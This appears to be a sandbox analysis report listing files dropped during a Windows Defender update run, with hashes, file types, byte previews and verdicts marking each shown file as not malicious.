C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\03A7312A-3D2B-4807-84DA-352D7F06B3B6MPTelemetrySubmit\watson_manifest.txt

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	1064
Entropy (8bit):	3.8155988132499155
Encrypted:	false
SSDEEP:	24:QaJlJzYBnjRkBDulC5Fg+u/1uW8sQ+u/1s24H:pJlJzKjaDZ56TuW8jTs24H
MD5:	2B6DE041139EB4CE6AF158056A8F1428
SHA1:	A69D321BB7B41B20936C2266AA71F7CF9704EA19
SHA-256:	EDDDA79261CD3FB39B8B6CB142666B0DAFA6CF10E590800D00722B4D51F29061
SHA-512:	17212EB331AFCA634E0CA2E85BCA30FA81C0A8FA0C7CBC927E1CCBEA9DB4A839CA62D0EFD0E950810DA73BE81F0E3E00A666BECAF25FF554D0E6A477DF2AAD3A
Malicious:	false
Preview:	......V.e.r.s.i.o.n.=.1.3.1.0.7.2.....U.I. .L.C.I.D.=.1.0.3.3.....U.I.F.l.a.g.s.=.1.....E.v.e.n.t.L.o.g.S.o.u.r.c.e.=.M.P.S.a.m.p.l.e.S.u.b.m.i.s.s.i.o.n.....R.e.p.o.r.t.i.n.g.F.l.a.g.s.=.0.....L.o.g.g.i.n.g.F.l.a.g.s.=.0.....G.e.n.e.r.a.l._.A.p.p.N.a.m.e.=.M.a.l.w.a.r.e. .S.i.g.n.a.t.u.r.e. .D.o.w.n.l.o.a.d.....E.v.e.n.t.T.y.p.e.=.M.p.T.e.l.e.m.e.t.r.y.....P.1.=.0.x.8.0.0.7.0.0.0.5.....P.2.=.V.a.l.i.d.a.t.e.U.p.d.a.t.e.....P.3.=.P.l.a.t.f.o.r.m. .u.p.d.a.t.e.....P.4.=.1...1...1.8.5.0.0...1.0.,.4...1.8...2.2.0.3...5.....P.5.=.m.p.s.i.g.s.t.u.b...e.x.e.....P.6.=.4...1.8...2.1.0.8...7.....P.7.=.M.i.c.r.o.s.o.f.t. .W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r. .(.R.S.1.+.).....F.i.l.e.s.T.o.K.e.e.p.=.C.:.\.W.i.n.d.o.w.s.\.S.E.R.V.I.C.~.1.\.N.E.T.W.O.R.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.3.A.7.3.1.2.A.-.3.D.2.B.-.4.8.0.7.-.8.4.D.A.-.3.5.2.D.7.F.0.6.B.3.B.6.M.P.T.e.l.e.m.e.t.r.y.S.u.b.m.i.t.\.c.l.i.e.n.t._.m.a.n.i.f.e.s.t...t.x.t.\|.C.:.\.W.i.n.d.o.w.s.\.S.E.R.V.I.C.~.1.\.N.E.T.W.O.R.~.1.\.A.p.

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	803176
Entropy (8bit):	6.37118649960636
Encrypted:	false
SSDEEP:	24576:Ghj1QlBYDgtUUvie3n+pB3+ojRlcD1VyZTFXk:GhpQlBHtBYla1VyZpU
MD5:	01F92DC7A766FF783AE7AF40FD0334FB
SHA1:	45D7B8E98E22F939ED0083FE31204CAA9A72FA76
SHA-256:	FA42B9B84754E2E8368E8929FA045BE86DBD72678176EE75814D2A16D23E5C26
SHA-512:	BEA5F3D7FB0984C4A71720F25644CE3151FCDC95586E1E2FFE804D04567AAF30D8678608110E241C7DDF908F94882EDDD84A994573B0C808D1C064F0E135A583
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B..#...#...#..EV...#...Q...#...Q...#...Q...#...Q...#...#..."..EV..#..EVN..#..EV...#..Rich.#..........PE..d.....P.........."......`....................@.............................0.......-....`.......... .......................................t..d....... ........D... ..h!... ......d...p.......................(......8...........0................................text...2R.......`.................. ..`.rdata.......p... ...p..............@..@.data..../....... ..................@....pdata...D.......P..................@..@.rsrc... ...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\mpasbase.vdm

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	54948312
Entropy (8bit):	7.996859326410134
Encrypted:	true
SSDEEP:	1572864:CPq28JE9x4iAPQwYJtW3obwsDceQ1Gl184F+:AqtJE9xP4QNIobwsD3L8H
MD5:	DD086FDB797CF2C0DFA138261C8BAEFC
SHA1:	3E12FEA6552D567AB669E6659415AC6367CAAD18
SHA-256:	743214AC6F3792CED1EB51125839B4E57D920EFFCA3EDAD6FB138A5143F45833
SHA-512:	89CE6B88CD9A93B035622D2EB0FC1DC2EA0B3139781BC360CBE0930BAAD9CE651B570819826AC3405B7B125A25433329CC89A3335AA3A947582101D2520F7CF8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R......R..P...R.Rich..R.PE..d.....b.........." .........JF..............................................pF......!G...`.......................................................... ...GF..........LF..%...........................................................................................rdata..p...........................@..@.rsrc....GF.. ...HF.................@..@......b........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... ...FF..rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\mpasdlta.vdm

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3043800
Entropy (8bit):	7.999448477784981
Encrypted:	true
SSDEEP:	49152:Ijk5hufQfKN1bAmdKmAMXmbljVLv68aptx2GUJ/oXsQ4lMhTWqFXJ1GXzX2qUfX0:N54fQfi1AQKeXaJVm8avx2rssliLXDUv
MD5:	8CBC2B60224A4F682E9D656FB71954C2
SHA1:	D465A4DA40D8D83035333AA796EFDF097EFEFB28
SHA-256:	9B49D04FEBBB31F010813566BE5888F9A2FA830EDE1B2DF40DCFA3339FF81D5D
SHA-512:	3123EB98B87416845F2E19F6CF95DB797030F0F93232749AE36D424419458D685DF24953FCAD227806E930EA52AE2F610CD39EDA869C346443641C858BEE3980
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R......R..P...R.Rich..R.PE..d....@.b.........." .........J...............................................p......m./...`.......................................................... ...G...........L...%...........................................................................................rdata..p...........................@..@.rsrc....G... ...H..................@..@.....@.b........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... ...F...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\mpavbase.vdm

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	46652896
Entropy (8bit):	7.997138501518718
Encrypted:	true
SSDEEP:	786432:v7hIRVH8K6Un3jWNai3DRf8XPlccGjxsB0V6MKIq781z+DR:DhIH8Kx3awCDR0t1Oxs4KIqdd
MD5:	BD5DD1EA1744FD5674150946BA28BE7F
SHA1:	7639206768C0BDDA308F0BB02D9E3FCCA134FE84
SHA-256:	F3DFDC237542CF9FB175C22F1A4651E7C7FAC5A136275B06F6982E607AC210E3
SHA-512:	0810F9362A362447D62A016C40607E0A44D544095288A9D8547C7727B3EA4CF2BCD2F37E920672279B603C97F473E0BA7E251EEE06E5088AEC49AF244C66C38D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R......R..P...R.Rich..R.PE..d.....b.........." .................................................................\|....`.......................................................... ...................%...........................................................................................rdata..p...........................@..@.rsrc........ ......................@..@......b........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... ......rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\mpavdlta.vdm

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	modified
Size (bytes):	1449944
Entropy (8bit):	7.997957843381355
Encrypted:	true
SSDEEP:	24576:PMEeDf+20iCoe5ItGGl/CGiAy9gLLKb546tha2P2mGIy4gzZyKiINTm2YDz/oaAl:PeDf+5do8It5/CQy9gLLKbCUha2PxsZt
MD5:	96F349289C1EC4B24F699FF444EDA90E
SHA1:	7BAD86AC34890316FF2682DA0BC02402B6F27EE7
SHA-256:	8E4B7CF3510F2947D24F8430BD537C3EC1959D5BEC9446E4282DE0E31F35F143
SHA-512:	49ABBF589F5C934037E2FF1A183B7873A10E5A8707C41983302F2186D2B28B33070C57313F4BA5B9EEA948AEC8E7107FF74A044E2201F6D6BD1BEDE81E23F6CA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R......R..P...R.Rich..R.PE..d....@.b.........." ......................................................... .......4....`.......................................................... ..x................%...........................................................................................rdata..p...........................@..@.rsrc...x.... ......................@..@.....@.b........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\mpengine.dll

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-e428c3f6.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	17066504
Entropy (8bit):	6.424166167554763
Encrypted:	false
SSDEEP:	196608:QHBT6uO6seVHZh4LGWThrMhxHyiD2YMMC5+H9u2h+cKSO/k4XK:06Csu5h4Lj92HygC5Ou2hFJ4XK
MD5:	8DF74DEA21B6EF76B6B47DE4FD6F6A0A
SHA1:	7783D1CAABF1981248EC41496A631CD1F543F9BE
SHA-256:	A583E84A264435320A726C9BF2E25AB8C2DBB7989623C66ACDBB5B316BA825C1
SHA-512:	DDEE6CAE573B7BA791E64B9B2DCEE7CA0817F4532FEBCEF999435D4D89A8CE5273D915A20A201025B6023A4FC3A729439136FCE59C93A2B82301EED80C2F607A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7..V.V.V.x$.V.V.tW.$#.V.x$..V.x$.V.x$.WV.x$...V.$#.V.....V.$#..uP.$#...V.$#.V.Rich.V.........PE..d...7&............" ..........R......zI........Z..................................... ....`A....................................................d.......x~......\|........j.............p.......................(......8...........0................................text............................... ..`.rdata....<.......<.................@..@.data............0..................@....pdata..\|............0..............@..@.rsrc...x~..........................@..@.reloc...............p..............@..B................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\ConfigSecurityPolicy.exe

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	468240
Entropy (8bit):	6.360644638246213
Encrypted:	false
SSDEEP:	6144:RTr4oQz0Snpz93hSq47wRv8TDXgxBQ9hRNmxziUsDRKoZxC:dMoQISnpJQq47wRv8mBQhuxTgZxC
MD5:	DEBD8C08F597085E793324EA3DF51BA2
SHA1:	47170493FF0B022F2BE8B49B16419D378913B5B0
SHA-256:	0BFCD9FCD173D1E084A1A6A3FA4A4D10611153E59641A6CFF589DC314B6CB4F3
SHA-512:	5E3AF790ABADC069189E245B887C35912F34A0E2616AECBCEC2CAF7279DFE2CF42902D2A15D57FC717323D9C3180F902705B2BD089B4E483A8D37F0252403576
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.f.g`..g`..g`..n...Q`..,...F`..,...h`..,....`..,...z`..g`...a..,....`..,...f`..,...f`..Richg`..................PE..d....~.u.........."..........P.................@............................. ......_f....`.......... .......................................(...........#.......:.......%......,.......p...................P...(.......@...........x...@............................text............................... ..`.rdata..V{..........................@..@.data...pD...P...0...P..............@....pdata...:.......@..................@..@.rsrc....#.......0..................@..@.reloc..,...........................@..B................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\DefenderCSP.dll

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	439560
Entropy (8bit):	6.244826977512736
Encrypted:	false
SSDEEP:	6144:I1CDcCY8lurGvlmiOFQZCLPTjHJLh9vDK+8KohLlxIf3rkxw:ZDcnOurGvMi3ZCLTjHJ7z8Ko2k+
MD5:	2D2C922CB7EFF1BEA2B37BFCA613918F
SHA1:	3F121AF117529D7696C061283B18F9D912D413CC
SHA-256:	074EB4CB2EB0C305777A255B1F2C0B720E993C3C73C2418413DA23947680D58A
SHA-512:	315E6AE4FA67EA2E97F09A5B325FDFAF1F493E1F5AE79721E84183CD3AA636AA36489CA282ACC160B6EAC986B0716C8D874EDDFAB52F47FAEFDB47B04B02C2A7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P.W.P.W.P.W.(.W.P.W.(.V.P.W.P.WfQ.W.(.V.P.W.(.V.P.W.(.V*P.W.(.V.P.W.(.V.P.W.({W.P.W.(.V.P.WRich.P.W................PE..d...$!............" .....`...0............................................................`A........................................p...p....................@...3.......%.......... ...p...................0...(......@...........X...8............................text...<R.......`.................. ..`.rdata......p.......p..............@..@.data....;.......0..................@....pdata...3...@...@...0..............@..@.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Drivers\WdBoot.sys

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	49600
Entropy (8bit):	6.271041266014457
Encrypted:	false
SSDEEP:	768:/+iOC5WnAO01IEn2eFI0/PGWNZAUMosM289zLFxD5:44VO+o0WUpFxFzRxD5
MD5:	FCC22A6DD21EA6D5A321A83AD8981F91
SHA1:	775B2536D4851DDB891294F181BF2D009F946E6A
SHA-256:	B5DCF872FAF039C2CF4A00F7922BC96191E4A1AFE6398548442448C4357FB287
SHA-512:	61C3CCB7830EEC8F21E6A51DAE281ED6FE08BAFAAF5694509F31DB1FC72B8951DC3FC8DBE8D603C7B8BE9F9C9E9D75345F129087F64A6AA2CE2A02D57EC052BC
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........I.Oz..Oz..Oz..O{..Oz..7{..Oz..7...Oz..7~..Oz..7y..Oz..7r..Oz..7...Oz..7x..Oz.Rich.Oz.................PE..d....I............"......d...4......................................................Pg....`A.................................................q..<.......`....`...........%......D....8..p...........................@0..@............p..`............................text............ .................. ..h.rdata.......0.......$..............@..H.data........P.......8..............@....pdata.......`.......<..............@..H.idata.......p.......@..............@..HPAGE...../.......0...H.............. ..`INIT....~............x.............. ..bGFIDS...$...........................@..B.rsrc...`...........................@..B.reloc..............................@..B........................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Drivers\WdDevFlt.sys

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	168200
Entropy (8bit):	6.164229812235971
Encrypted:	false
SSDEEP:	3072:yoEnKPnLzxxrXPoziVMUQwUfPqJOlmHt3EJ/6/:tEAnLLXgzgM3NfPqJOlI4i/
MD5:	E8A73F836E3C20352681EECFF0A7146C
SHA1:	BFD81B0F250B78E2B7DB30D5E59059FF8273DD6A
SHA-256:	76B160CA85AF454C4C95884DF52160B0D2D2E8DBF75F11623EEDC6721F1ED6A9
SHA-512:	2E8D5796DF81BC6EA5A42E0DCF24514AFE920354BAF93B937D19C0482FB8241ED2730C559848F8F844C97F054DC8FB1681410929570784E189DF8DB16A1F7E2E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........1W.._..._..._..Z..._...^.W._..^..._..[..._..\..._..W..._......_..]..._.Rich.._.........................PE..d......[..........".................0h.....................................................A....................................................P....................l...%..............p...........................pb..@............................................text...jM.......P.................. ..h.rdata...Y...`...\...T..............@..H.data... ...........................@....pdata..............................@..H.idata........... ..................@..HPAGE....B5.......8.................. ..`INIT....%)...@...,... .............. ..bGFIDS........p.......L..............@..B.rsrc................P..............@..B.reloc...............X..............@..B................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Drivers\WdFilter.sys

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	443664
Entropy (8bit):	6.370764098869939
Encrypted:	false
SSDEEP:	6144:gBGvC+2CpTRJg9rIIRM75PFL6CwsJStkbwRKnyL/EkGFNOBkq0uA0QrKI69iVF/D:gBGR2CpTgiIRHZswWukyL/EkIfj69i4O
MD5:	B8948D2DC799045C0473B61CB75556A3
SHA1:	4B3D486127712D7B3C38E9724DD650C8F8896799
SHA-256:	5788A05FFAACE6D816C2F50797836E20E876F7C05BAF7A546F121763D5618667
SHA-512:	442BC95E5F43290C6EC35D4ACBA8F40A507C748D2CFBE05993D7EE4A3B18EF33C0071F6579535F8246E7E5B846AAADD3A881B7FE2249A8C1D1FA0F84B1EE09D0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........`^...0...0...0...1...0..y1...0..y5...0..y4...0..y3...0..y8...0..y...0..y2...0.Rich..0.........PE..d....=.u.........."......h...8.......z....................................................A....................................................P............p...#.......%.......... &..p...............................@............................................text............................... ..h.rdata.............................@..H.data...d....`.......H..............@....pdata...#...p...$...P..............@..H.idata...-.......0...t..............@..HPAGE....WG.......H.................. ..`INIT.....]... ...`.................. ..bINIT.................L..............@...GFIDS...@............T..............@..B.rsrc................X..............@..B.reloc.../.......0...p..............@..B........................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Drivers\WdNisDrv.sys

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	90384
Entropy (8bit):	6.182687893566412
Encrypted:	false
SSDEEP:	1536:A5POPUX+xxJXvwp+79ChiuTss2x1g59GfeYJ9c5vXD4PMWZzjj3:A5POP/VfIaChBk2ZYJ9GD4b73
MD5:	3D868C25CE5F5AA4087C279C1326312A
SHA1:	14143AAD35F31E3B73363572D7E2F4F56D50C8BB
SHA-256:	39992D638AF2C889591541B9676E62A2E4CA650143833C04A31B9ADBB83E584C
SHA-512:	098CC84A0EE9DBF13432B2723F7867D3FD669CF9F83FA5C6A6060B6F31DB1CF35CD1C7A02D80EC6BE6ABAA2A24BDE96019C5B37A5D9DC3976FF5FECEA377AA24
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...U...U...U...-...U...U...U...-...U...-...U...-...U...-...U...-J..U...-...U..Rich.U..........................PE..d....>............"..........\.......p...............................................G....`A................................................p#..P....................<...%......L...(...p...............................@............ ..@............................text.............................. ..h.rdata..`".......$..................@..H.data...(...........................@....pdata..............................@..H.idata....... ......................@..HPAGE..... ...@...$.................. ..`INIT.........p....... .............. ..bGFIDS................$..............@..B.rsrc................(..............@..B.reloc...............0..............@..B................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Microsoft-Antimalware-AMFilter.man

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	12624
Entropy (8bit):	5.259327730394375
Encrypted:	false
SSDEEP:	192:/5mm9AfGjUa1rIL+FUVin2F/OZDfYj5YbAxqTSSS6S8SzSySovK1ZVuB:/5mm9AfGtML+Fws2Fo7m5YcxHKrVo
MD5:	B6D65A86FC1999A62DA10EA3C4CAD3E4
SHA1:	E79E97C04D8540A2005D21021F7781676E705BCD
SHA-256:	05B2BFD40FB3A344C3AE178C420A7FEA9595815CB1CC07843078112F5F551EAF
SHA-512:	7F13B4930F9BF9ABCFD64E905DA4F0111B34197A533FB0162E43C4C80F39D135ADAA09C3E7AF3E95397BEF5D1D323E75721CEE150517CB13EBED3029C781BEC6
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v3" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">...<assemblyIdentity buildType="release" language="neutral" name="Windows-Defender-Drivers" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384" versionScope="nonSxS"></assemblyIdentity>... .. *********************************************************************************************************.. Driver files.. *********************************************************************************************************.. -->...<file destinationPath="$(runtime.drivers)" importPath="$(build.campBinaryImportPath)" name="WdFilter.sys" sourceName="WdFilter.sys" sourcePath=".\"></file>...<file destinationPath="$(runtime.drivers)" importPath="$(build.campBinaryImportPath)" name="WdBoot.sys" sourceName="WdBoot.sys" sou

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Microsoft-Antimalware-NIS.man

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	6173
Entropy (8bit):	5.373156847974759
Encrypted:	false
SSDEEP:	96:/3coK5HjFWr/96Hj+Uul2lewqo3nRtlUl3lflxSDwMKRbRhK18YaKMr4e:/mDFcujBuEgI3nzC1Z6V8f3
MD5:	5562965C32F03AE0DF8B9DEF950F8651
SHA1:	6E5AD734AB6A9F8B82B19024E21007AC2CAD2540
SHA-256:	EA64BE59286B67AE930729FA92B2B08DCE5C2EAEB70FEABE2320C47FB6DDAC6C
SHA-512:	F64D728AFE40800968D0B165019E775F62F2CCA40BFBB370F52F4BA8FCC2574F79D2C4AC41CCAE6E1CEC23082BA24B5E6C0A5531E6B336683BEEEDDA3CB81CDE
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v3" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">...<assemblyIdentity buildType="release" language="neutral" name="Windows-Defender-Service-NisSrvEtw" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384" versionScope="nonSxS"></assemblyIdentity>...<instrumentation>....<events xmlns="http://schemas.microsoft.com/win/2004/08/events" xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events">.....<provider guid="{102aab0a-9d9c-4887-a860-55de33b96595}" message="$(string.Microsoft-Antimalware-NIS.provider.name)" messageFileName="%ProgramFiles%\Windows Defender\NisSrv.exe" name="Microsoft-Antimalware-NIS" resourceFileName="%ProgramFiles%\Windows Defender\NisSrv.exe" symbol="Microsoft_Antimalware_NIS">......<tasks>.......<task eventGUID="{b33e041e-3a75-4f52-bf0e-c85d0963b7fb}" name="N

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Microsoft-Antimalware-Protection.man

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	3369
Entropy (8bit):	5.312049604455802
Encrypted:	false
SSDEEP:	96:/3poK58yFND08uf9zXzUzCzwat0kz9nHHzyPYjHMrje:/FbFHuf9DzUOVJ1HHePv2
MD5:	E4AD891E7B62475FCA109C0DF4DEF16E
SHA1:	B7DC3C04C67D7903E04B0EBF2AB7840AAA717EE0
SHA-256:	DF9AD93CDB61587A35FCDCE996955A64413439A474D85C86133A9E9C185D1966
SHA-512:	0849CB6F3DAA6C80B94F770E29BD389B67D31E089595B22BFAF1D6F25C6E847DA4DCBFF135F6D96E30597991FF6C8CA8EB5306C4E8D1B334016220058B2969E1
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v3" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">...<assemblyIdentity buildType="release" language="neutral" name="Windows-Defender-Service-MpClientEtw" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384" versionScope="nonSxS"></assemblyIdentity>...<instrumentation>....<events xmlns="http://schemas.microsoft.com/win/2004/08/events" xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events">.....<provider guid="{e4b70372-261f-4c54-8fa6-a5a7914d73da}" message="$(string.Microsoft-Antimalware-Protection.provider.name)" messageFileName="%programfiles%\Windows Defender\MpClient.dll" name="Microsoft-Antimalware-Protection" resourceFileName="%programfiles%\Windows Defender\MpClient.dll" symbol="Microsoft_Antimalware_Protection">......<tasks>.......<task eventGUID="{7db81ddd-d2be-41bd-

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Microsoft-Antimalware-RTP.man

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	14126
Entropy (8bit):	5.339552069740082
Encrypted:	false
SSDEEP:	192:/ozFIItP1HvYoPp5z7YlAZSJwfnyygPJ2HofEj:/QFIwP1PYoh5WAZSJwfsJ2YC
MD5:	0EA061B68884A0E5AD4B1F4A93B1FBF6
SHA1:	479BEC2F0FD6EC228498F12DC48B798649D5EF25
SHA-256:	1F78E8C7AE754DA422F11439E732628BE78F8BC85625CF4EBFFCF64C536679FF
SHA-512:	8ACEB6F8C3C853C2CCED573F2B047A710731628CD6E8BCFD3C9DAD1763A827ACDF107E0B7927BEDA8F6E359DE1629D0AF79550ACD956AC624FB20242EB8F2FF0
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v3" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">...<assemblyIdentity buildType="release" language="neutral" name="Windows-Defender-Service-MpRtpEtw" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384" versionScope="nonSxS"></assemblyIdentity>...<instrumentation>....<events xmlns="http://schemas.microsoft.com/win/2004/08/events" xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events">.....<provider guid="{8e92deef-5e17-413b-b927-59b2f06a3cfc}" message="$(string.Microsoft-Antimalware-RTP.provider.name)" messageFileName="%programfiles%\Windows Defender\MpRtp.dll" name="Microsoft-Antimalware-RTP" resourceFileName="%programfiles%\Windows Defender\MpRtp.dll" symbol="Microsoft_Antimalware_RTP">......<maps>.......<valueMap name="DlpOperationType">........<map message="$(string.Ope

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Microsoft-Antimalware-Service.man

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	33315
Entropy (8bit):	5.255657210238715
Encrypted:	false
SSDEEP:	384:/VFriW4cboWcauSi6fZeeEifUhwqh+46AJJCZvsp33icjEtRMdR2CEaXU1Hgb1R5:tFriHcblBLkJ1ycgtOHNXNxBn
MD5:	8EF4C46C00C562586B156D49E8EC6EA1
SHA1:	55C52B40219A564C01274922DB1F67F04D9C8CDC
SHA-256:	CDA3076B92F47438ADAF45388C38C6213D70070908A8F5CCA6D667F8C32E4FF0
